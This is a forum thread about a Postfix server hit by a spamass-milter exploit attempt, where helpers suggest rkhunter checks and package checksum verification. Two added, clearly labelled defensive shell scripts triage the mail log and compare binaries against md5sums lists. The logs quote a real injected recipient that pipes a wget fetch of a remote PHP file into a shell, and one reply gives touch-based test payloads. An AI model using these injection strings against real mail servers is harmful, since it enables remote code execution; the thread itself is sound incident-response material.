HowtoForge Forums > Linux Forums > Server Operation

#1 - bswinnerton (Senior Member), 20th April 2010, 17:39
Think I may have been hacked..

Browsing through some of my logs today, I found that I have new mail which says the following:

Code:
R   7 blue@dick.com      Sun Apr 18 14:48  25/1227  blue@dick.com
And further:

Code:
Date: Sun, 18 Apr 2010 14:48:52 -0400 (EDT)
From: blue@dick.com
To: undisclosed-recipients:;
So I peered into my mail.log and found the following:

Code:
Apr 18 14:48:38 myserver postfix/qmgr[1802]: 1542F2056C: from=<blue@****.com>, size=203, nrcpt=1 (queue active)
Apr 18 14:48:38 myserver postfix/smtpd[12476]: disconnect from unknown[135.196.243.201]
Apr 18 14:48:52 myserver postfix/smtpd[12483]: connect from localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/smtpd[12483]: 510422064F: client=localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/cleanup[12480]: 510422064F: message-id=<20100418184852.510422064F@myserver.mysite.com>
Apr 18 14:48:52 myserver postfix/smtpd[12483]: disconnect from localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 510422064F: from=<blue@****.com>, size=1041, nrcpt=1 (queue active)
Apr 18 14:48:52 myserver amavis[4240]: (04240-16) Passed BAD-HEADER, [135.196.243.201] [135.196.243.201] <blue@****.com> -> <"root+:|wget http://fortunes.in/x1x.php"@myserver.mysite.com>, quarantine: X/badh-XQqZlXm4bqH6, mail_id: XQqZ$
Apr 18 14:48:52 myserver postfix/smtp[12481]: 1542F2056C: to=<root+:|wget http://fortunes.in/x1x.php@myserver.mysite.com>, orig_to=<root+:|wget http://fortunes.in/x1x.php>, relay=127.0.0.1[127.0.0.1]:10024, delay=15, delays=0.23/0.03/$
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 1542F2056C: removed   
Apr 18 14:48:52 myserver postfix/local[12487]: warning: 510422064F: address with illegal extension: root+:|wget http://fortunes.in/x1x.php
Apr 18 14:48:52 myserver postfix/local[12487]: 510422064F: to=<root+:|wget http://fortunes.in/x1x.php@myserver.mysite.com>, relay=local, delay=0.18, delays=0.08/0.06/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 510422064F: removed
Is it something I should be concerned with? How can I check to see if the hacker was successful?
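
The first place to look for an answer to that question is the mail log itself. The script below is an added example, not code from the thread: it flags Postfix queue IDs whose recipient extension (after the '+' recipient_delimiter) contains shell metacharacters, then gathers every log line for those IDs so the client, the postfix/local warning and the delivery status can be read together. The sample log, its hostnames, queue IDs and URL are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): triage a Postfix mail.log for messages whose
# recipient extension (after the '+' recipient_delimiter) carries shell metacharacters,
# the pattern seen in the posted log, and pull every line for those queue IDs together.

# Write a constructed sample log (hosts, IDs and URL are made up) to the file named in $1.
make_sample_log() {
  cat > "$1" <<'EOF'
Apr 18 14:48:30 myserver postfix/smtpd[12470]: AAAA1111AA: client=mail.example.org[192.0.2.10]
Apr 18 14:48:30 myserver postfix/local[12471]: AAAA1111AA: to=<alice+news@myserver.mysite.com>, relay=local, status=sent (delivered to mailbox)
Apr 18 14:48:52 myserver postfix/smtpd[12483]: 510422064F: client=localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/local[12487]: warning: 510422064F: address with illegal extension: root+:|wget http://example.invalid/x.php
Apr 18 14:48:52 myserver postfix/local[12487]: 510422064F: to=<root+:|wget http://example.invalid/x.php@myserver.mysite.com>, relay=local, status=sent (delivered to mailbox)
EOF
}

# Print the queue IDs of messages whose recipient local part contains a pipe,
# semicolon or backtick after the '+' delimiter (one ID per line, deduplicated).
suspicious_queue_ids() {
  grep -E 'to=<[^>@]*\+[^>@]*[|;`]' "$1" \
    | sed -E 's|^.*postfix/[a-z]+\[[0-9]+]: ([0-9A-F]+):.*$|\1|' \
    | sort -u
}

# For each suspicious queue ID print every log line carrying that ID, so client,
# warning and delivery status are read as one story. Returns 1 if nothing matched.
triage_mail_log() {
  ids=$(suspicious_queue_ids "$1")
  [ -n "$ids" ] || return 1
  for id in $ids; do
    grep -F "$id:" "$1"
  done
}

# Stand-alone demo on the constructed log: sh triage.sh --demo
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp)
  make_sample_log "$tmp"
  triage_mail_log "$tmp"
  rm -f "$tmp"
fi
```

The "address with illegal extension" warning from postfix/local is the cheapest single signal to alert on; a following line with status=sent shows the message was still delivered locally.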

#2 - topdog (Senior Member), 20th April 2010, 21:53

Someone is trying to exploit your system using the spamass-milter vulnerability.

#3 - bswinnerton (Senior Member), 20th April 2010, 22:04

Quote: Originally Posted by topdog
Someone is trying to exploit your system using the spamass-milter vulnerability.
And how can I check if they were successful?

#4 - Ben (Moderator), 21st April 2010, 09:34

Quote:
Apr 18 14:48:52 myserver postfix/local[12487]: 510422064F: to=<root+:|wget http://fortunes.in/x1x.php@myserver.mysite.com>, relay=local, delay=0.18, delays=0.08/0.06/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 510422064F: removed
I'd assume they have been successful in any way, as at least postfix delivered the wget command to the mailbox.
So you might try to search for x1x.php on your filesystem if it is still there.

Another possibility would be to try rkhunter (rootkit.nl) to check what this tells you.

Do you have checks for fqdn_recipient in your postfix's main.cf? As in my case the exploit did not work if this check is set up.

#5 - Ben (Moderator), 21st April 2010, 10:50

OK, the recipient thing does not really work when escaping illegal chars with a \.
So I'd expect, if you are vulnerable to this attack, you should find a file "foo" in your /tmp folder if sending a mail to one of the following recipients via email:

Quote:
root+:|touch\ /tmp/foo\;@anyofyourdomains.com

OR

root+:|touch /tmp/foo@anyofyourdomains.com

#6 - bswinnerton (Senior Member), 21st April 2010, 14:46

Hmm, well I wasn't able to find any x1x.php, but that's not to say that the exploiter hasn't already removed it. Here's postconf -n:

Code:
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
append_dot_mydomain = no
biff = no
body_checks = regexp:/etc/postfix/body_checks
broken_sasl_auth_clients = yes
config_directory = /etc/postfix
content_filter = amavis:[127.0.0.1]:10024
header_checks = regexp:/etc/postfix/header_checks
html_directory = /usr/share/doc/postfix/html
inet_interfaces = all
mailbox_size_limit = 0
message_size_limit = 0
mime_header_checks = regexp:/etc/postfix/mime_header_checks
mydestination = myserver.mysite.com, localhost, localhost.localdomain
myhostname = myserver.mysite.com
mynetworks = 127.0.0.0/8 [::1]/128
myorigin = /etc/mailname
nested_header_checks = regexp:/etc/postfix/nested_header_checks
proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks $virtual_mailbox_limit_maps
readme_directory = /usr/share/doc/postfix
receive_override_options = no_address_mappings
recipient_delimiter = +
relay_domains = mysql:/etc/postfix/mysql-virtual_relaydomains.cf
relay_recipient_maps = mysql:/etc/postfix/mysql-virtual_relayrecipientmaps.cf
relayhost = 
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
smtpd_client_restrictions = check_client_access mysql:/etc/postfix/mysql-virtual_client.cf
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, check_recipient_access mysql:/etc/postfix/mysql-virtual_recipient.cf, reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sasl_authenticated_header = yes
smtpd_sender_restrictions = check_sender_access mysql:/etc/postfix/mysql-virtual_sender.cf
smtpd_tls_cert_file = /etc/postfix/smtpd.cert
smtpd_tls_key_file = /etc/postfix/smtpd.key
smtpd_tls_security_level = may
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtpd_use_tls = yes
transport_maps = proxy:mysql:/etc/postfix/mysql-virtual_transports.cf
virtual_alias_domains = 
virtual_alias_maps = proxy:mysql:/etc/postfix/mysql-virtual_forwardings.cf, mysql:/etc/postfix/mysql-virtual_email2email.cf
virtual_gid_maps = static:5000
virtual_mailbox_base = /var/vmail
virtual_mailbox_domains = proxy:mysql:/etc/postfix/mysql-virtual_domains.cf
virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql-virtual_mailboxes.cf
virtual_transport = maildrop
virtual_uid_maps = static:5000
And here is last night's rkhunter log:

Code:
Warning: The file properties have changed:
         File: /usr/bin/dpkg
         Current hash: 53d7c6c257b70f354bcf6d1cddd171180b24e8d0
         Stored hash : 53e46099fb111f5909e9a6a4be154f11f1743d4c
         Current inode: 19311    Stored inode: 613
         Current size: 391920    Stored size: 412400
         Current file modification time: 1268271142
         Stored file modification time : 1253435026
Warning: The file properties have changed:
         File: /usr/bin/dpkg-query
         Current hash: e3fa9c39564c1860bd7d86f7005a90ef8da821a2
         Stored hash : 1d9ca0bf53cdc2ab56850192c86ad17b863d58d9
         Current inode: 19314    Stored inode: 616
         Current size: 96172    Stored size: 104420
         Current file modification time: 1268271142
         Stored file modification time : 1253435026
Warning: The file properties have changed:
         File: /usr/bin/sudo
         Current hash: daa60130c30c5df58e10e6d280fd9dfcb5673ecf
         Stored hash : 8ac63a420a2fa2b359777f66a35e8c86d948108c
         Current inode: 5147    Stored inode: 8325
         Current file modification time: 1271179871
         Stored file modification time : 1267140126
Warning: The file properties have changed:
         File: /sbin/ifdown
         Current hash: 9b09364c44c8d6891c6e7bee14943b280bf10cc8
         Stored hash : 59b6b8df01abc4004a13dec4f174c7c3715dc6c7
         Current inode: 17690    Stored inode: 6038
         Current size: 34692    Stored size: 38844
         Current file modification time: 1266866128
         Stored file modification time : 1253661804
Warning: The file properties have changed:
         File: /sbin/ifup
         Current hash: 9b09364c44c8d6891c6e7bee14943b280bf10cc8
         Stored hash : 59b6b8df01abc4004a13dec4f174c7c3715dc6c7
         Current inode: 17690    Stored inode: 6038
         Current size: 34692    Stored size: 38844
         Current file modification time: 1266866128
         Stored file modification time : 1253661804
Warning: Application 'gpg', version '1.4.9', is out of date, and possibly a security risk.
Warning: Application 'openssl', version '0.9.8g', is out of date, and possibly a security risk.
Warning: Application 'php', version '5.2.10', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '5.1p1', is out of date, and possibly a security risk.
Nothing really looks out of the ordinary. What do you think?

#7 - topdog (Senior Member), 21st April 2010, 15:14

You do have a problem, dpkg and other binaries have been modified.

#8 - bswinnerton (Senior Member), 21st April 2010, 15:22

Perhaps. ifup/ifdown were from an update that I did the other day. I just assumed that dpkg was also part of an update.

I've never used rkhunter before ISPConfig 3. I just thought that maybe it was a little "over" cautious. How can I tell if dpkg has been compromised?

#9 - topdog (Senior Member), 21st April 2010, 15:24

Download the same version and check the checksums.

#10 - bswinnerton (Senior Member), 21st April 2010, 16:27

Quote: Originally Posted by topdog
Download the same version and check the checksums.
I'm sorry to be a pain. Never done this before. I'm trying to find the download on the internet, but it's just the .tar.gz to build dpkg, how would I actually verify the md5 of the compiled dpkg?
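
There is no need to build dpkg from source: Debian and Ubuntu binary packages ship an md5sums list for every file they install, so the installed files can be compared against the list from a freshly downloaded copy of the same package version (apt-get download dpkg, then dpkg-deb -e dpkg_*.deb ref/DEBIAN to extract ref/DEBIAN/md5sums), rather than against the copy in /var/lib/dpkg/info, which a tampered dpkg could have rewritten as well. The script below is an added example, not from the thread; the demo tree, file contents and hashes it builds are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): compare files on disk with a package's
# md5sums list ("<md5>  <path relative to />", the format of DEBIAN/md5sums and
# /var/lib/dpkg/info/<pkg>.md5sums). On a suspect host take the list from a
# freshly downloaded copy of the same package version, e.g.
#   apt-get download dpkg
#   dpkg-deb -e dpkg_*.deb ref/DEBIAN     # yields ref/DEBIAN/md5sums
#   verify_md5sums ref/DEBIAN/md5sums /
# and run it from a rescue system if the local tools themselves are in doubt.

# verify_md5sums LIST ROOT: print one line per missing or modified file,
# return 1 if any mismatch was found, 0 if every entry checked out.
verify_md5sums() {
  list=$1; root=$2; bad=0
  while read -r expected path; do
    [ -n "$path" ] || continue
    if [ ! -f "$root/$path" ]; then
      printf 'MISSING  %s\n' "$path"; bad=1; continue
    fi
    actual=$(md5sum "$root/$path" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
      printf 'MODIFIED %s (expected %s, got %s)\n' "$path" "$expected" "$actual"
      bad=1
    fi
  done < "$list"
  return "$bad"
}

# Build a constructed demo tree under $1: two fake binaries, a list that matches
# them, and a tampered list with one wrong hash and one file that does not exist.
make_demo_tree() {
  mkdir -p "$1/usr/bin"
  printf 'fake dpkg\n'       > "$1/usr/bin/dpkg"
  printf 'fake dpkg-query\n' > "$1/usr/bin/dpkg-query"
  (cd "$1" && md5sum usr/bin/dpkg usr/bin/dpkg-query) > "$1/clean.md5sums"
  sed '1s/^[0-9a-f]\{32\}/00000000000000000000000000000000/' "$1/clean.md5sums" \
    > "$1/tampered.md5sums"
  echo 'ffffffffffffffffffffffffffffffff  usr/bin/dpkg-deb' >> "$1/tampered.md5sums"
}

# Stand-alone demo: sh verify.sh --demo
if [ "${1:-}" = "--demo" ]; then
  d=$(mktemp -d)
  make_demo_tree "$d"
  verify_md5sums "$d/clean.md5sums" "$d" && echo "clean list: OK"
  verify_md5sums "$d/tampered.md5sums" "$d" || echo "tampered list: mismatches found"
  rm -rf "$d"
fi
```

The rkhunter hashes in the earlier post are 40 hex characters (SHA-1), so they cannot be compared directly with the MD5 list; the inode and size changes it reports alongside them are what a package upgrade also produces, and /var/log/dpkg.log records whether such an upgrade of dpkg actually happened on those dates.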